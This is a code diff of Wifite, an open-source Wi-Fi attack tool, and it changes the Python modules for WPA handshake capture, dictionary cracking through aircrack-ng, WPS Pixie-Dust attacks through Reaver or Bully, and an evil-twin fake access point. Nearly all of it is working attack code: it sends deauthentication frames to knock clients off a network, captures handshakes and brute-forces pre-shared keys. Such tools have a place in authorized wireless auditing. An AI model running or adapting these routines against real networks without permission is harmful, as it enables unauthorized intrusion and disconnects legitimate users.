@@ -57,9 +59,8 @@ class AttackWPA(Attack):
|
|||||||
self.success = True
|
self.success = True
|
||||||
return self.success
|
return self.success
|
||||||
|
|
||||||
|
|
||||||
def capture_handshake(self):
|
def capture_handshake(self):
|
||||||
'''Returns captured or stored handshake, otherwise None.'''
|
''' Returns captured or stored handshake, otherwise None '''
|
||||||
handshake = None
|
handshake = None
|
||||||
|
|
||||||
# First, start Airodump process
|
# First, start Airodump process
|
||||||
@@ -69,7 +70,7 @@ class AttackWPA(Attack):
|
|||||||
output_file_prefix='wpa') as airodump:
|
output_file_prefix='wpa') as airodump:
|
||||||
|
|
||||||
Color.clear_entire_line()
|
Color.clear_entire_line()
|
||||||
Color.pattack('WPA', self.target, 'Handshake capture', 'Waiting for target to appear...')
|
Color.pattack("WPA", self.target, "Handshake capture", "Waiting for target to appear...")
|
||||||
airodump_target = self.wait_for_target(airodump)
|
airodump_target = self.wait_for_target(airodump)
|
||||||
|
|
||||||
self.clients = []
|
self.clients = []
|
||||||
@@ -80,7 +81,7 @@ class AttackWPA(Attack):
|
|||||||
essid = airodump_target.essid if airodump_target.essid_known else None
|
essid = airodump_target.essid if airodump_target.essid_known else None
|
||||||
handshake = self.load_handshake(bssid=bssid, essid=essid)
|
handshake = self.load_handshake(bssid=bssid, essid=essid)
|
||||||
if handshake:
|
if handshake:
|
||||||
Color.pattack('WPA', self.target, 'Handshake capture', 'found {G}existing handshake{W} for {C}%s{W}' % handshake.essid)
|
Color.pattack("WPA", self.target, "Handshake capture", "found {G}existing handshake{W} for {C}%s{W}" % handshake.essid)
|
||||||
Color.pl('\n{+} Using handshake from {C}%s{W}' % handshake.capfile)
|
Color.pl('\n{+} Using handshake from {C}%s{W}' % handshake.capfile)
|
||||||
return handshake
|
return handshake
|
||||||
|
|
||||||
@@ -90,10 +91,10 @@ class AttackWPA(Attack):
|
|||||||
while handshake is None and not timeout_timer.ended():
|
while handshake is None and not timeout_timer.ended():
|
||||||
step_timer = Timer(1)
|
step_timer = Timer(1)
|
||||||
Color.clear_entire_line()
|
Color.clear_entire_line()
|
||||||
Color.pattack('WPA',
|
Color.pattack("WPA",
|
||||||
airodump_target,
|
airodump_target,
|
||||||
'Handshake capture',
|
"Handshake capture",
|
||||||
'Listening. (clients:{G}%d{W}, deauth:{O}%s{W}, timeout:{R}%s{W})' % (len(self.clients), deauth_timer, timeout_timer))
|
"Listening. (clients:{G}%d{W}, deauth:{O}%s{W}, timeout:{R}%s{W})" % (len(self.clients), deauth_timer, timeout_timer))
|
||||||
|
|
||||||
# Find .cap file
|
# Find .cap file
|
||||||
cap_files = airodump.find_files(endswith='.cap')
|
cap_files = airodump.find_files(endswith='.cap')
|
||||||
@@ -113,12 +114,7 @@ class AttackWPA(Attack):
|
|||||||
handshake = Handshake(temp_file, bssid=bssid, essid=essid)
|
handshake = Handshake(temp_file, bssid=bssid, essid=essid)
|
||||||
if handshake.has_handshake():
|
if handshake.has_handshake():
|
||||||
# We got a handshake
|
# We got a handshake
|
||||||
Color.clear_entire_line()
|
Color.pl('\n\n{+} {G}successfully captured handshake{W}')
|
||||||
Color.pattack('WPA',
|
|
||||||
airodump_target,
|
|
||||||
'Handshake capture',
|
|
||||||
'{G}Captured handshake{W}')
|
|
||||||
Color.pl('')
|
|
||||||
break
|
break
|
||||||
|
|
||||||
# There is no handshake
|
# There is no handshake
|
||||||
@@ -131,11 +127,11 @@ class AttackWPA(Attack):
|
|||||||
for client in airodump_target.clients:
|
for client in airodump_target.clients:
|
||||||
if client.station not in self.clients:
|
if client.station not in self.clients:
|
||||||
Color.clear_entire_line()
|
Color.clear_entire_line()
|
||||||
Color.pattack('WPA',
|
Color.pattack("WPA",
|
||||||
airodump_target,
|
airodump_target,
|
||||||
'Handshake capture',
|
"Handshake capture",
|
||||||
'Discovered new client: {G}%s{W}' % client.station)
|
"Discovered new client: {G}%s{W}" % client.station)
|
||||||
Color.pl('')
|
Color.pl("")
|
||||||
self.clients.append(client.station)
|
self.clients.append(client.station)
|
||||||
|
|
||||||
# Send deauth to a client or broadcast
|
# Send deauth to a client or broadcast
|
||||||
@@ -150,53 +146,49 @@ class AttackWPA(Attack):
|
|||||||
|
|
||||||
if handshake is None:
|
if handshake is None:
|
||||||
# No handshake, attack failed.
|
# No handshake, attack failed.
|
||||||
Color.pl('\n{!} {O}WPA handshake capture {R}FAILED:{O} Timed out after %d seconds' % (Configuration.wpa_attack_timeout))
|
Color.pl("\n{!} {O}WPA handshake capture {R}FAILED:{O} Timed out after %d seconds" % (Configuration.wpa_attack_timeout))
|
||||||
return handshake
|
return handshake
|
||||||
else:
|
else:
|
||||||
# Save copy of handshake to ./hs/
|
# Save copy of handshake to ./hs/
|
||||||
self.save_handshake(handshake)
|
self.save_handshake(handshake)
|
||||||
return handshake
|
return handshake
|
||||||
|
|
||||||
@staticmethod
|
def crack_handshake(self, handshake, wordlist):
|
||||||
def crack_handshake(handshake, wordlist, verbose=False):
|
|
||||||
'''Tries to crack a handshake. Returns WPA key if found, otherwise None.'''
|
'''Tries to crack a handshake. Returns WPA key if found, otherwise None.'''
|
||||||
if wordlist is None:
|
if wordlist is None:
|
||||||
Color.pl('{!} {O}Not cracking handshake because' +
|
Color.pl("{!} {O}Not cracking handshake because" +
|
||||||
' wordlist ({R}--dict{O}) is not set')
|
" wordlist ({R}--dict{O}) is not set")
|
||||||
return None
|
return None
|
||||||
elif not os.path.exists(wordlist):
|
elif not os.path.exists(wordlist):
|
||||||
Color.pl('{!} {O}Not cracking handshake because' +
|
Color.pl("{!} {O}Not cracking handshake because" +
|
||||||
' wordlist {R}%s{O} was not found' % wordlist)
|
" wordlist {R}%s{O} was not found" % wordlist)
|
||||||
return None
|
return None
|
||||||
|
|
||||||
if not verbose:
|
Color.pl("\n{+} {C}Cracking WPA Handshake:{W} Using {C}aircrack-ng{W} via" +
|
||||||
Color.pl('\n{+} {C}Cracking WPA Handshake:{W} Using {C}aircrack-ng{W} via' +
|
" {C}%s{W} wordlist" % os.path.split(wordlist)[-1])
|
||||||
' {C}%s{W} wordlist' % os.path.split(wordlist)[-1])
|
|
||||||
|
|
||||||
key_file = Configuration.temp('wpakey.txt')
|
key_file = Configuration.temp('wpakey.txt')
|
||||||
command = [
|
command = [
|
||||||
'aircrack-ng',
|
"aircrack-ng",
|
||||||
'-a', '2',
|
"-a", "2",
|
||||||
'-w', wordlist,
|
"-w", wordlist,
|
||||||
'--bssid', handshake.bssid,
|
"--bssid", handshake.bssid,
|
||||||
'-l', key_file,
|
"-l", key_file,
|
||||||
handshake.capfile
|
handshake.capfile
|
||||||
]
|
]
|
||||||
if verbose:
|
|
||||||
Color.pl('{+} {D}Running: {W}{P}%s{W}' % ' '.join(command))
|
|
||||||
crack_proc = Process(command)
|
crack_proc = Process(command)
|
||||||
|
|
||||||
# Report progress of cracking
|
# Report progress of cracking
|
||||||
aircrack_nums_re = re.compile(r'(\d+)/(\d+) keys tested.*\(([\d.]+)\s+k/s')
|
aircrack_nums_re = re.compile(r"(\d+)/(\d+) keys tested.*\(([\d.]+)\s+k/s")
|
||||||
aircrack_key_re = re.compile(r'Current passphrase:\s*([^\s].*[^\s])\s*$')
|
aircrack_key_re = re.compile(r"Current passphrase:\s*([^\s].*[^\s])\s*$")
|
||||||
num_tried = num_total = 0
|
num_tried = num_total = 0
|
||||||
percent = num_kps = 0.0
|
percent = num_kps = 0.0
|
||||||
eta_str = 'unknown'
|
eta_str = "unknown"
|
||||||
current_key = ''
|
current_key = ''
|
||||||
while crack_proc.poll() is None:
|
while crack_proc.poll() is None:
|
||||||
line = crack_proc.pid.stdout.readline()
|
line = crack_proc.pid.stdout.readline()
|
||||||
match_nums = aircrack_nums_re.search(line.decode('utf-8'))
|
match_nums = aircrack_nums_re.search(line)
|
||||||
match_keys = aircrack_key_re.search(line.decode('utf-8'))
|
match_keys = aircrack_key_re.search(line)
|
||||||
if match_nums:
|
if match_nums:
|
||||||
num_tried = int(match_nums.group(1))
|
num_tried = int(match_nums.group(1))
|
||||||
num_total = int(match_nums.group(2))
|
num_total = int(match_nums.group(2))
|
||||||
@@ -209,30 +201,26 @@ class AttackWPA(Attack):
|
|||||||
else:
|
else:
|
||||||
continue
|
continue
|
||||||
|
|
||||||
status = '\r{+} {C}Cracking WPA Handshake: %0.2f%%{W}' % percent
|
status = "\r{+} {C}Cracking WPA Handshake: %0.2f%%{W}" % percent
|
||||||
status += ' ETA: {C}%s{W}' % eta_str
|
status += " ETA: {C}%s{W}" % eta_str
|
||||||
status += ' @ {C}%0.1fkps{W}' % num_kps
|
status += " @ {C}%0.1fkps{W}" % num_kps
|
||||||
#status += ' ({C}%d{W}/{C}%d{W} keys)' % (num_tried, num_total)
|
#status += " ({C}%d{W}/{C}%d{W} keys)" % (num_tried, num_total)
|
||||||
status += ' (current key: {C}%s{W})' % current_key
|
status += " (current key: {C}%s{W})" % current_key
|
||||||
if not verbose:
|
|
||||||
Color.clear_entire_line()
|
Color.clear_entire_line()
|
||||||
Color.p(status)
|
Color.p(status)
|
||||||
|
|
||||||
if not verbose:
|
Color.pl("")
|
||||||
Color.pl('')
|
|
||||||
|
|
||||||
# Check crack result
|
# Check crack result
|
||||||
if os.path.exists(key_file):
|
if os.path.exists(key_file):
|
||||||
with open(key_file, 'r') as fid:
|
with open(key_file, "r") as fid:
|
||||||
key = fid.read().strip()
|
key = fid.read().strip()
|
||||||
os.remove(key_file)
|
os.remove(key_file)
|
||||||
|
|
||||||
if not verbose:
|
Color.pl("{+} {G}Cracked WPA Handshake{W} PSK: {G}%s{W}\n" % key)
|
||||||
Color.pl('{+} {G}Cracked WPA Handshake{W} PSK: {G}%s{W}\n' % key)
|
|
||||||
return key
|
return key
|
||||||
else:
|
else:
|
||||||
if not verbose:
|
Color.pl("{!} {R}Failed to crack handshake:" +
|
||||||
Color.pl('{!} {R}Failed to crack handshake: {O}%s{R} did not contain password{W}' % wordlist.split(os.sep)[-1])
|
" {O}%s{R} did not contain password{W}" % wordlist.split(os.sep)[-1])
|
||||||
return None
|
return None
|
||||||
|
|
||||||
def load_handshake(self, bssid, essid):
|
def load_handshake(self, bssid, essid):
|
||||||
@@ -265,17 +253,14 @@ class AttackWPA(Attack):
|
|||||||
os.mkdir(Configuration.wpa_handshake_dir)
|
os.mkdir(Configuration.wpa_handshake_dir)
|
||||||
|
|
||||||
# Generate filesystem-safe filename from bssid, essid and date
|
# Generate filesystem-safe filename from bssid, essid and date
|
||||||
if handshake.essid and type(handshake.essid) is str:
|
|
||||||
essid_safe = re.sub('[^a-zA-Z0-9]', '', handshake.essid)
|
essid_safe = re.sub('[^a-zA-Z0-9]', '', handshake.essid)
|
||||||
else:
|
|
||||||
essid_safe = 'UnknownEssid'
|
|
||||||
bssid_safe = handshake.bssid.replace(':', '-')
|
bssid_safe = handshake.bssid.replace(':', '-')
|
||||||
date = time.strftime('%Y-%m-%dT%H-%M-%S')
|
date = time.strftime('%Y-%m-%dT%H-%M-%S')
|
||||||
cap_filename = 'handshake_%s_%s_%s.cap' % (essid_safe, bssid_safe, date)
|
cap_filename = 'handshake_%s_%s_%s.cap' % (essid_safe, bssid_safe, date)
|
||||||
cap_filename = os.path.join(Configuration.wpa_handshake_dir, cap_filename)
|
cap_filename = os.path.join(Configuration.wpa_handshake_dir, cap_filename)
|
||||||
|
|
||||||
if Configuration.wpa_strip_handshake:
|
if Configuration.wpa_strip_handshake:
|
||||||
Color.p('{+} {C}stripping{W} non-handshake packets, saving to {G}%s{W}...' % cap_filename)
|
Color.p("{+} {C}stripping{W} non-handshake packets, saving to {G}%s{W}..." % cap_filename)
|
||||||
handshake.strip(outfile=cap_filename)
|
handshake.strip(outfile=cap_filename)
|
||||||
Color.pl('{G}saved{W}')
|
Color.pl('{G}saved{W}')
|
||||||
else:
|
else:
|
||||||
@@ -297,25 +282,25 @@ class AttackWPA(Attack):
|
|||||||
|
|
||||||
for index, client in enumerate([None] + self.clients):
|
for index, client in enumerate([None] + self.clients):
|
||||||
if client is None:
|
if client is None:
|
||||||
target_name = '*broadcast*'
|
target_name = "*broadcast*"
|
||||||
else:
|
else:
|
||||||
target_name = client
|
target_name = client
|
||||||
Color.clear_entire_line()
|
Color.clear_entire_line()
|
||||||
Color.pattack('WPA',
|
Color.pattack("WPA",
|
||||||
target,
|
target,
|
||||||
'Handshake capture',
|
"Handshake capture",
|
||||||
'Deauthing {O}%s{W}' % target_name)
|
"Deauthing {O}%s{W}" % target_name)
|
||||||
Aireplay.deauth(target.bssid, client_mac=client, timeout=2)
|
Aireplay.deauth(target.bssid, client_mac=client, timeout=2)
|
||||||
|
|
||||||
if __name__ == '__main__':
|
if __name__ == '__main__':
|
||||||
Configuration.initialize(True)
|
Configuration.initialize(True)
|
||||||
from ..model.target import Target
|
from ..model.target import Target
|
||||||
fields = 'A4:2B:8C:16:6B:3A, 2015-05-27 19:28:44, 2015-05-27 19:28:46, 11, 54e,WPA, WPA, , -58, 2, 0, 0. 0. 0. 0, 9, Test Router Please Ignore, '.split(',')
|
fields = "A4:2B:8C:16:6B:3A, 2015-05-27 19:28:44, 2015-05-27 19:28:46, 11, 54e,WPA, WPA, , -58, 2, 0, 0. 0. 0. 0, 9, Test Router Please Ignore, ".split(',')
|
||||||
target = Target(fields)
|
target = Target(fields)
|
||||||
wpa = AttackWPA(target)
|
wpa = AttackWPA(target)
|
||||||
try:
|
try:
|
||||||
wpa.run()
|
wpa.run()
|
||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
Color.pl('')
|
Color.pl("")
|
||||||
pass
|
pass
|
||||||
Configuration.exit_gracefully(0)
|
Configuration.exit_gracefully(0)
|
||||||
|
|||||||
@@ -1,9 +1,11 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
from ..model.attack import Attack
|
from ..model.attack import Attack
|
||||||
from ..util.color import Color
|
from ..util.color import Color
|
||||||
from ..config import Configuration
|
from ..config import Configuration
|
||||||
|
from ..tools.bully import Bully
|
||||||
|
from ..tools.reaver import Reaver
|
||||||
|
|
||||||
class AttackWPS(Attack):
|
class AttackWPS(Attack):
|
||||||
def __init__(self, target):
|
def __init__(self, target):
|
||||||
@@ -15,45 +17,31 @@ class AttackWPS(Attack):
|
|||||||
''' Run all WPS-related attacks '''
|
''' Run all WPS-related attacks '''
|
||||||
|
|
||||||
# Drop out if user specified to not use Reaver/Bully
|
# Drop out if user specified to not use Reaver/Bully
|
||||||
if Configuration.use_pmkid_only:
|
|
||||||
self.success = False
|
|
||||||
return False
|
|
||||||
|
|
||||||
if Configuration.no_wps:
|
if Configuration.no_wps:
|
||||||
Color.pl('\r{!} {O}--no-wps{R} set, ignoring WPS attack on {O}%s{W}' % self.target.essid)
|
Color.pl('\r{!} {O}--no-wps{R} set, ignoring WPS attack on {O}%s{W}' % self.target.essid)
|
||||||
self.success = False
|
self.success = False
|
||||||
return False
|
return self.success
|
||||||
|
|
||||||
|
###################
|
||||||
|
# Pixie-Dust attack
|
||||||
if Configuration.use_bully:
|
if Configuration.use_bully:
|
||||||
return self.run_bully()
|
|
||||||
else:
|
|
||||||
return self.run_reaver()
|
|
||||||
|
|
||||||
return False
|
|
||||||
|
|
||||||
|
|
||||||
def run_bully(self):
|
|
||||||
# Bully: Pixie-dust
|
# Bully: Pixie-dust
|
||||||
from ..tools.bully import Bully
|
|
||||||
bully = Bully(self.target)
|
bully = Bully(self.target)
|
||||||
bully.run()
|
bully.run()
|
||||||
bully.stop()
|
bully.stop()
|
||||||
self.crack_result = bully.crack_result
|
self.crack_result = bully.crack_result
|
||||||
self.success = self.crack_result is not None
|
self.success = self.crack_result is not None
|
||||||
return self.success
|
return self.success
|
||||||
|
|
||||||
|
|
||||||
def run_reaver(self):
|
|
||||||
from ..tools.reaver import Reaver
|
|
||||||
reaver = Reaver(self.target)
|
|
||||||
if not reaver.is_pixiedust_supported():
|
|
||||||
Color.pl('{!} {R}your version of "reaver" does not support the {O}WPS pixie-dust attack{W}')
|
|
||||||
return False
|
|
||||||
else:
|
else:
|
||||||
|
reaver = Reaver(self.target)
|
||||||
|
if reaver.is_pixiedust_supported():
|
||||||
# Reaver: Pixie-dust
|
# Reaver: Pixie-dust
|
||||||
reaver = Reaver(self.target)
|
reaver = Reaver(self.target)
|
||||||
reaver.run()
|
reaver.run()
|
||||||
self.crack_result = reaver.crack_result
|
self.crack_result = reaver.crack_result
|
||||||
self.success = self.crack_result is not None
|
self.success = self.crack_result is not None
|
||||||
return self.success
|
return self.success
|
||||||
|
else:
|
||||||
|
Color.pl("{!} {R}your version of 'reaver' does not support the {O}WPS pixie-dust attack{W}")
|
||||||
|
|
||||||
|
return False
|
||||||
|
|||||||
@@ -1,14 +1,16 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
import os
|
import os
|
||||||
|
|
||||||
from .util.color import Color
|
from .util.color import Color
|
||||||
|
from .util.input import raw_input
|
||||||
|
from .tools.iwconfig import Iwconfig
|
||||||
from .tools.macchanger import Macchanger
|
from .tools.macchanger import Macchanger
|
||||||
|
|
||||||
class Configuration(object):
|
class Configuration(object):
|
||||||
''' Stores configuration variables and functions for Wifite. '''
|
''' Stores configuration variables and functions for Wifite. '''
|
||||||
version = '2.2.1'
|
version = '2.1.5'
|
||||||
|
|
||||||
initialized = False # Flag indicating config has been initialized
|
initialized = False # Flag indicating config has been initialized
|
||||||
temp_dir = None # Temporary directory
|
temp_dir = None # Temporary directory
|
||||||
@@ -55,8 +57,7 @@ class Configuration(object):
|
|||||||
# EvilTwin variables
|
# EvilTwin variables
|
||||||
cls.use_eviltwin = False
|
cls.use_eviltwin = False
|
||||||
cls.eviltwin_port = 80
|
cls.eviltwin_port = 80
|
||||||
cls.eviltwin_deauth_iface = None
|
cls.eviltwin_iface = None
|
||||||
cls.eviltwin_fakeap_iface = None
|
|
||||||
|
|
||||||
# WEP variables
|
# WEP variables
|
||||||
cls.wep_filter = False # Only attack WEP networks
|
cls.wep_filter = False # Only attack WEP networks
|
||||||
@@ -66,7 +67,7 @@ class Configuration(object):
|
|||||||
cls.require_fakeauth = False
|
cls.require_fakeauth = False
|
||||||
cls.wep_restart_stale_ivs = 11 # Seconds to wait before restarting
|
cls.wep_restart_stale_ivs = 11 # Seconds to wait before restarting
|
||||||
# Aireplay if IVs don't increaes.
|
# Aireplay if IVs don't increaes.
|
||||||
# '0' means never restart.
|
# "0" means never restart.
|
||||||
cls.wep_restart_aircrack = 30 # Seconds to give aircrack to crack
|
cls.wep_restart_aircrack = 30 # Seconds to give aircrack to crack
|
||||||
# before restarting the process.
|
# before restarting the process.
|
||||||
cls.wep_crack_at_ivs = 10000 # Number of IVS to start cracking
|
cls.wep_crack_at_ivs = 10000 # Number of IVS to start cracking
|
||||||
@@ -76,17 +77,13 @@ class Configuration(object):
|
|||||||
cls.wpa_filter = False # Only attack WPA networks
|
cls.wpa_filter = False # Only attack WPA networks
|
||||||
cls.wpa_deauth_timeout = 15 # Wait time between deauths
|
cls.wpa_deauth_timeout = 15 # Wait time between deauths
|
||||||
cls.wpa_attack_timeout = 500 # Wait time before failing
|
cls.wpa_attack_timeout = 500 # Wait time before failing
|
||||||
cls.wpa_handshake_dir = 'hs' # Dir to store handshakes
|
cls.wpa_handshake_dir = "hs" # Dir to store handshakes
|
||||||
cls.wpa_strip_handshake = False # Strip non-handshake packets
|
cls.wpa_strip_handshake = False # Strip non-handshake packets
|
||||||
cls.ignore_old_handshakes = False # Always fetch a new handshake
|
cls.ignore_old_handshakes = False # Always fetch a new handshake
|
||||||
cls.use_pmkid_only = False # Only use PMKID Capture+Crack attack
|
|
||||||
|
|
||||||
# Default dictionary for cracking
|
# Default dictionary for cracking
|
||||||
cls.wordlist = None
|
cls.wordlist = None
|
||||||
wordlists = [
|
wordlists = [
|
||||||
'./wordlist-top4800-probable.txt',
|
|
||||||
'/usr/share/wordlists/wordlist-top4800-probable.txt',
|
|
||||||
'/usr/local/share/wordlists/wordlist-top4800-probable.txt',
|
|
||||||
'/usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/passwds/phpbb.txt',
|
'/usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/passwds/phpbb.txt',
|
||||||
'/usr/share/fuzzdb/wordlists-user-passwd/passwds/phpbb.txt',
|
'/usr/share/fuzzdb/wordlists-user-passwd/passwds/phpbb.txt',
|
||||||
'/usr/share/wordlists/fern-wifi/common.txt'
|
'/usr/share/wordlists/fern-wifi/common.txt'
|
||||||
@@ -126,9 +123,52 @@ class Configuration(object):
|
|||||||
if cls.random_mac:
|
if cls.random_mac:
|
||||||
Macchanger.random()
|
Macchanger.random()
|
||||||
|
|
||||||
@staticmethod
|
@classmethod
|
||||||
def get_wireless_interface():
|
def get_eviltwin_interface(cls):
|
||||||
pass
|
if cls.eviltwin_iface is None:
|
||||||
|
Color.pl('\n{+} {G}Evil Twin attack{W}')
|
||||||
|
Color.p('{+} looking for wireless interfaces in "Managed" mode... ')
|
||||||
|
|
||||||
|
ifaces = Iwconfig.get_interfaces(mode='Managed')
|
||||||
|
|
||||||
|
if len(ifaces) == 0:
|
||||||
|
Color.pl('\n{!} {O}no other wireless interfaces in "Managed" mode!{W}')
|
||||||
|
raise Exception('eviltwin attack requires two wireless cards (1 monitor-mode, 1 managed-mode)')
|
||||||
|
|
||||||
|
Color.clear_entire_line()
|
||||||
|
|
||||||
|
while True:
|
||||||
|
# Ask user to select eviltwin interface
|
||||||
|
Color.pl(' select the interface for the {C}evil twin{W} access point:')
|
||||||
|
for index, iface in enumerate(ifaces, start=1):
|
||||||
|
Color.pl(' {G}%d{W}. {C}%s{W}' % (index, iface))
|
||||||
|
|
||||||
|
question = '{+} enter number ({G}'
|
||||||
|
if len(ifaces) == 1:
|
||||||
|
question += '1'
|
||||||
|
else:
|
||||||
|
question += '1-%d' % len(ifaces)
|
||||||
|
question += '{W}): '
|
||||||
|
selection = raw_input(Color.s(question))
|
||||||
|
|
||||||
|
if selection.strip() in ifaces:
|
||||||
|
selection = str(ifaces.index(selection.strip()) + 1)
|
||||||
|
|
||||||
|
elif not selection.isdigit():
|
||||||
|
Color.pl('\n{!} {O}selection must be numeric{W}')
|
||||||
|
continue
|
||||||
|
|
||||||
|
selection = int(selection)
|
||||||
|
|
||||||
|
if selection < 1 or selection > len(ifaces):
|
||||||
|
Color.pl('\n{!} {O}selection must be between {R}1{O} and {R}%d{W}' % len(ifaces))
|
||||||
|
continue
|
||||||
|
|
||||||
|
break
|
||||||
|
|
||||||
|
cls.eviltwin_iface = ifaces[selection - 1]
|
||||||
|
|
||||||
|
return cls.eviltwin_iface
|
||||||
|
|
||||||
@classmethod
|
@classmethod
|
||||||
def load_from_arguments(cls):
|
def load_from_arguments(cls):
|
||||||
@@ -179,12 +219,23 @@ class Configuration(object):
|
|||||||
cls.kill_conflicting_processes = True
|
cls.kill_conflicting_processes = True
|
||||||
Color.pl('{+} {C}option:{W} kill conflicting processes {G}enabled{W}')
|
Color.pl('{+} {C}option:{W} kill conflicting processes {G}enabled{W}')
|
||||||
|
|
||||||
|
|
||||||
# EvilTwin
|
# EvilTwin
|
||||||
'''
|
if args.eviltwin_iface:
|
||||||
|
# Check that eviltwin_iface exists in iwconfig
|
||||||
|
existing_ifaces = Iwconfig.get_interfaces()
|
||||||
|
if args.eviltwin_iface not in existing_ifaces:
|
||||||
|
raise Exception('Interface "%s" was not found by iwconfig (found %s)' % (args.eviltwin_iface, ','.join(existing_ifaces)))
|
||||||
|
# TODO: Put device into managed mode?
|
||||||
|
|
||||||
|
cls.eviltwin_iface = args.eviltwin_iface
|
||||||
|
Color.pl('{+} {C}option:{W} using {G}%s{W} to create fake AP for evil twin attacks' % cls.eviltwin_iface)
|
||||||
|
|
||||||
if args.use_eviltwin:
|
if args.use_eviltwin:
|
||||||
|
# TODO: Or ask user to select a different wireless device?
|
||||||
cls.use_eviltwin = True
|
cls.use_eviltwin = True
|
||||||
Color.pl('{+} {C}option:{W} using {G}eviltwin attacks{W} against all targets')
|
Color.pl('{+} {C}option:{W} attacking all targets using {G}eviltwin attacks{W}')
|
||||||
'''
|
|
||||||
|
|
||||||
# WEP
|
# WEP
|
||||||
if args.wep_filter:
|
if args.wep_filter:
|
||||||
@@ -229,16 +280,13 @@ class Configuration(object):
|
|||||||
Color.pl('{+} {C}option:{W} will stop WPA handshake capture after {G}%d seconds{W}' % args.wpa_attack_timeout)
|
Color.pl('{+} {C}option:{W} will stop WPA handshake capture after {G}%d seconds{W}' % args.wpa_attack_timeout)
|
||||||
if args.ignore_old_handshakes:
|
if args.ignore_old_handshakes:
|
||||||
cls.ignore_old_handshakes = True
|
cls.ignore_old_handshakes = True
|
||||||
Color.pl('{+} {C}option:{W} will {O}ignore{W} existing handshakes (force capture)')
|
Color.pl("{+} {C}option:{W} will {O}ignore{W} existing handshakes (force capture)")
|
||||||
if args.use_pmkid_only:
|
|
||||||
cls.use_pmkid_only = True
|
|
||||||
Color.pl('{+} {C}option:{W} will ONLY use {C}PMKID{W} attack on WPA networks')
|
|
||||||
if args.wpa_handshake_dir:
|
if args.wpa_handshake_dir:
|
||||||
cls.wpa_handshake_dir = args.wpa_handshake_dir
|
cls.wpa_handshake_dir = args.wpa_handshake_dir
|
||||||
Color.pl('{+} {C}option:{W} will store handshakes to {G}%s{W}' % args.wpa_handshake_dir)
|
Color.pl('{+} {C}option:{W} will store handshakes to {G}%s{W}' % args.wpa_handshake_dir)
|
||||||
if args.wpa_strip_handshake:
|
if args.wpa_strip_handshake:
|
||||||
cls.wpa_strip_handshake = True
|
cls.wpa_strip_handshake = True
|
||||||
Color.pl('{+} {C}option:{W} will {G}strip{W} non-handshake packets')
|
Color.pl("{+} {C}option:{W} will {G}strip{W} non-handshake packets")
|
||||||
|
|
||||||
# WPS
|
# WPS
|
||||||
if args.wps_filter:
|
if args.wps_filter:
|
||||||
@@ -372,7 +420,7 @@ class Configuration(object):
|
|||||||
for (key,val) in sorted(cls.__dict__.items()):
|
for (key,val) in sorted(cls.__dict__.items()):
|
||||||
if key.startswith('__') or type(val) == staticmethod or val is None:
|
if key.startswith('__') or type(val) == staticmethod or val is None:
|
||||||
continue
|
continue
|
||||||
result += Color.s('{G}%s {W} {C}%s{W}\n' % (key.ljust(max_len),val))
|
result += Color.s("{G}%s {W} {C}%s{W}\n" % (key.ljust(max_len),val))
|
||||||
return result
|
return result
|
||||||
|
|
||||||
if __name__ == '__main__':
|
if __name__ == '__main__':
|
||||||
|
|||||||
0
wifite/model/__init__.py
Executable file → Normal file
0
wifite/model/__init__.py
Executable file → Normal file
@@ -1,4 +1,4 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
import time
|
import time
|
||||||
@@ -12,7 +12,7 @@ class Attack(object):
|
|||||||
self.target = target
|
self.target = target
|
||||||
|
|
||||||
def run(self):
|
def run(self):
|
||||||
raise Exception('Unimplemented method: run')
|
raise Exception("Unimplemented method: run")
|
||||||
|
|
||||||
def wait_for_target(self, airodump):
|
def wait_for_target(self, airodump):
|
||||||
'''Waits for target to appear in airodump.'''
|
'''Waits for target to appear in airodump.'''
|
||||||
|
|||||||
@@ -1,9 +1,9 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
class Client(object):
|
class Client(object):
|
||||||
'''
|
'''
|
||||||
Holds details for a 'Client' - a wireless device (e.g. computer)
|
Holds details for a "Client" - a wireless device (e.g. computer)
|
||||||
that is associated with an Access Point (e.g. router)
|
that is associated with an Access Point (e.g. router)
|
||||||
'''
|
'''
|
||||||
|
|
||||||
|
|||||||
@@ -1,4 +1,4 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
from ..util.process import Process
|
from ..util.process import Process
|
||||||
@@ -9,23 +9,19 @@ from ..tools.pyrit import Pyrit
|
|||||||
import re, os
|
import re, os
|
||||||
|
|
||||||
class Handshake(object):
|
class Handshake(object):
|
||||||
|
|
||||||
def __init__(self, capfile, bssid=None, essid=None):
|
def __init__(self, capfile, bssid=None, essid=None):
|
||||||
self.capfile = capfile
|
self.capfile = capfile
|
||||||
self.bssid = bssid
|
self.bssid = bssid
|
||||||
self.essid = essid
|
self.essid = essid
|
||||||
|
|
||||||
|
|
||||||
def divine_bssid_and_essid(self):
|
def divine_bssid_and_essid(self):
|
||||||
'''
|
'''
|
||||||
Tries to find BSSID and ESSID from cap file.
|
Tries to find BSSID and ESSID from cap file.
|
||||||
Sets this instances 'bssid' and 'essid' instance fields.
|
Sets this instances 'bssid' and 'essid' instance fields.
|
||||||
'''
|
'''
|
||||||
|
|
||||||
# We can get BSSID from the .cap filename if Wifite captured it.
|
|
||||||
# ESSID is stripped of non-printable characters, so we can't rely on that.
|
|
||||||
if self.bssid is None:
|
if self.bssid is None:
|
||||||
hs_regex = re.compile(r'^.*handshake_\w+_([0-9A-F\-]{17})_.*\.cap$', re.IGNORECASE)
|
hs_regex = re.compile(r"^.*handshake_\w+_([0-9A-F\-]{17})_.*\.cap$", re.IGNORECASE)
|
||||||
match = hs_regex.match(self.capfile)
|
match = hs_regex.match(self.capfile)
|
||||||
if match:
|
if match:
|
||||||
